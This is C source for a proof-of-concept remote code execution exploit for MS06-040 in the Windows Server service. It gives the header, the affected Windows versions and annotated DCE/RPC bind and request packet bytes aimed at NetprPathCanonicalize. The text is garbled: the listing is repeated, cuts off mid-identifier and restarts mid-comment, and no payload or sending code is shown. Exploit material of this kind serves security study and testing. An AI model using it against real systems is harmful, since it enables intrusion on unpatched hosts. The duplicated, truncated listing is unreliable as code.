/*
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
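/*
 * DCE/RPC bind PDU (72 bytes on the wire) for the srvsvc interface
 * 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0, negotiating the NDR transfer
 * syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 v2.
 *
 * Layout (multi-byte fields little-endian, per the 0x10 data representation):
 *   05 00 0B 03   rpc_vers 5.0, ptype 0x0B (bind), pfc_flags 0x03 (first|last frag)
 *   10 00 00 00   data representation (little-endian, ASCII, IEEE)
 *   48 00         frag_length = 0x48 = 72, equal to the byte count below
 *   00 00         auth_length = 0
 *   00 00 00 00   call_id
 *   D0 16 D0 16   max_xmit_frag / max_recv_frag = 0x16D0
 *   00 00 00 00   assoc_group_id
 *   01 00 00 00   one presentation context (+3 pad)
 *   00 00 01 00   context_id 0, one transfer syntax (+1 pad)
 *   C8 4F .. 88   abstract syntax UUID (srvsvc), then 03 00 00 00 = v3.0
 *   04 5D .. 60   transfer syntax UUID (NDR),   then 02 00 00 00 = v2
 *
 * NOTE: the bytes are written as a string literal, so the initializer appends
 * a terminating NUL: sizeof(DCERPC_Bind_RPC_Service) is 73, not 72. Code that
 * sends this buffer must use sizeof(...) - 1 (or frag_length) as the length,
 * or the peer receives a stray trailing byte.
 * NOTE(review): the listing this was recovered from had every escape as "/x05"
 * (forward slash). That is not a C escape -- it compiles to the four ASCII
 * characters '/', 'x', '0', '5' -- so the arrays held text, not packet bytes.
 * Restored to "\x05" here.
 */
unsigned char DCERPC_Bind_RPC_Service[] =
"\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
"\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88"
"\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
"\x2B\x10\x48\x60\x02\x00\x00\x00";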
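/*
 * DCE/RPC request PDU header (24 bytes) followed by the first 20 bytes of NDR
 * stub data, addressed to srvsvc opnum 0x1f (31) = NetprPathCanonicalize.
 *
 * Layout:
 *   05 00 00 03   rpc_vers 5.0, ptype 0x00 (request), pfc_flags 0x03 (first|last)
 *   10 00 00 00   data representation
 *   30 08         frag_length = 0x0830 = 2096 -- the size of the WHOLE PDU as
 *                 sent, not of this array; the remaining stub bytes must be
 *                 appended from other buffers before sending
 *   00 00         auth_length = 0
 *   00 00 00 00   call_id
 *   18 08 00 00   alloc_hint = 0x0818 = 2072 (= frag_length - 24, i.e. the
 *                 stub length, of which only 20 bytes are here)
 *   00 00         context_id 0 (the context established by the bind above)
 *   1f 00         opnum 0x1f
 *   ff ff ff ff 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00
 *                 start of the NDR stub; presumably a unique-pointer referent
 *                 plus a conformant/varying string header for the first
 *                 argument -- confirm against the srvsvc IDL before relying on it
 *
 * NOTE: sizeof(DCERPC_Request_RPC_Service) is 45 because of the string-literal
 * NUL; the payload is 44 bytes. Use sizeof(...) - 1 when copying it out.
 * NOTE(review): escapes restored from the garbled "/x05" form of the original
 * listing to real "\x05" hex escapes (see the bind PDU above).
 */
unsigned char DCERPC_Request_RPC_Service[] =
"\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00"
"\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";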
// path ...
unsigned char DCERPC_Request_RPC_Servic
* MS06-040 Remote Code Execution Proof of Concept
*
* Ported by ub3r st4r aka iRP
* ---------------------------------------------------------------------
* Tested Against:
* Windows XP SP1
* Windows 2000 SP4
*
* Systems Affected:
* Microsoft Windows 2000 SP0-SP4
* Microsoft Windows XP SP0-SP1
* Microsoft Windows NT 4.0
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
* PRIVATE v.0.2 (08-27-06)
*/
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")
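/*
 * DCE/RPC bind PDU (72 bytes on the wire) for the srvsvc interface
 * 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0, negotiating the NDR transfer
 * syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 v2.
 *
 * Layout (multi-byte fields little-endian, per the 0x10 data representation):
 *   05 00 0B 03   rpc_vers 5.0, ptype 0x0B (bind), pfc_flags 0x03 (first|last frag)
 *   10 00 00 00   data representation (little-endian, ASCII, IEEE)
 *   48 00         frag_length = 0x48 = 72, equal to the byte count below
 *   00 00         auth_length = 0
 *   00 00 00 00   call_id
 *   D0 16 D0 16   max_xmit_frag / max_recv_frag = 0x16D0
 *   00 00 00 00   assoc_group_id
 *   01 00 00 00   one presentation context (+3 pad)
 *   00 00 01 00   context_id 0, one transfer syntax (+1 pad)
 *   C8 4F .. 88   abstract syntax UUID (srvsvc), then 03 00 00 00 = v3.0
 *   04 5D .. 60   transfer syntax UUID (NDR),   then 02 00 00 00 = v2
 *
 * NOTE: the bytes are written as a string literal, so the initializer appends
 * a terminating NUL: sizeof(DCERPC_Bind_RPC_Service) is 73, not 72. Code that
 * sends this buffer must use sizeof(...) - 1 (or frag_length) as the length,
 * or the peer receives a stray trailing byte.
 * NOTE(review): the listing this was recovered from had every escape as "/x05"
 * (forward slash). That is not a C escape -- it compiles to the four ASCII
 * characters '/', 'x', '0', '5' -- so the arrays held text, not packet bytes.
 * Restored to "\x05" here.
 */
unsigned char DCERPC_Bind_RPC_Service[] =
"\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
"\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88"
"\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
"\x2B\x10\x48\x60\x02\x00\x00\x00";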
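/*
 * DCE/RPC request PDU header (24 bytes) followed by the first 20 bytes of NDR
 * stub data, addressed to srvsvc opnum 0x1f (31) = NetprPathCanonicalize.
 *
 * Layout:
 *   05 00 00 03   rpc_vers 5.0, ptype 0x00 (request), pfc_flags 0x03 (first|last)
 *   10 00 00 00   data representation
 *   30 08         frag_length = 0x0830 = 2096 -- the size of the WHOLE PDU as
 *                 sent, not of this array; the remaining stub bytes must be
 *                 appended from other buffers before sending
 *   00 00         auth_length = 0
 *   00 00 00 00   call_id
 *   18 08 00 00   alloc_hint = 0x0818 = 2072 (= frag_length - 24, i.e. the
 *                 stub length, of which only 20 bytes are here)
 *   00 00         context_id 0 (the context established by the bind above)
 *   1f 00         opnum 0x1f
 *   ff ff ff ff 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00
 *                 start of the NDR stub; presumably a unique-pointer referent
 *                 plus a conformant/varying string header for the first
 *                 argument -- confirm against the srvsvc IDL before relying on it
 *
 * NOTE: sizeof(DCERPC_Request_RPC_Service) is 45 because of the string-literal
 * NUL; the payload is 44 bytes. Use sizeof(...) - 1 when copying it out.
 * NOTE(review): escapes restored from the garbled "/x05" form of the original
 * listing to real "\x05" hex escapes (see the bind PDU above).
 */
unsigned char DCERPC_Request_RPC_Service[] =
"\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00"
"\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";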
// path ...
unsigned char DCERPC_Request_RPC_Servic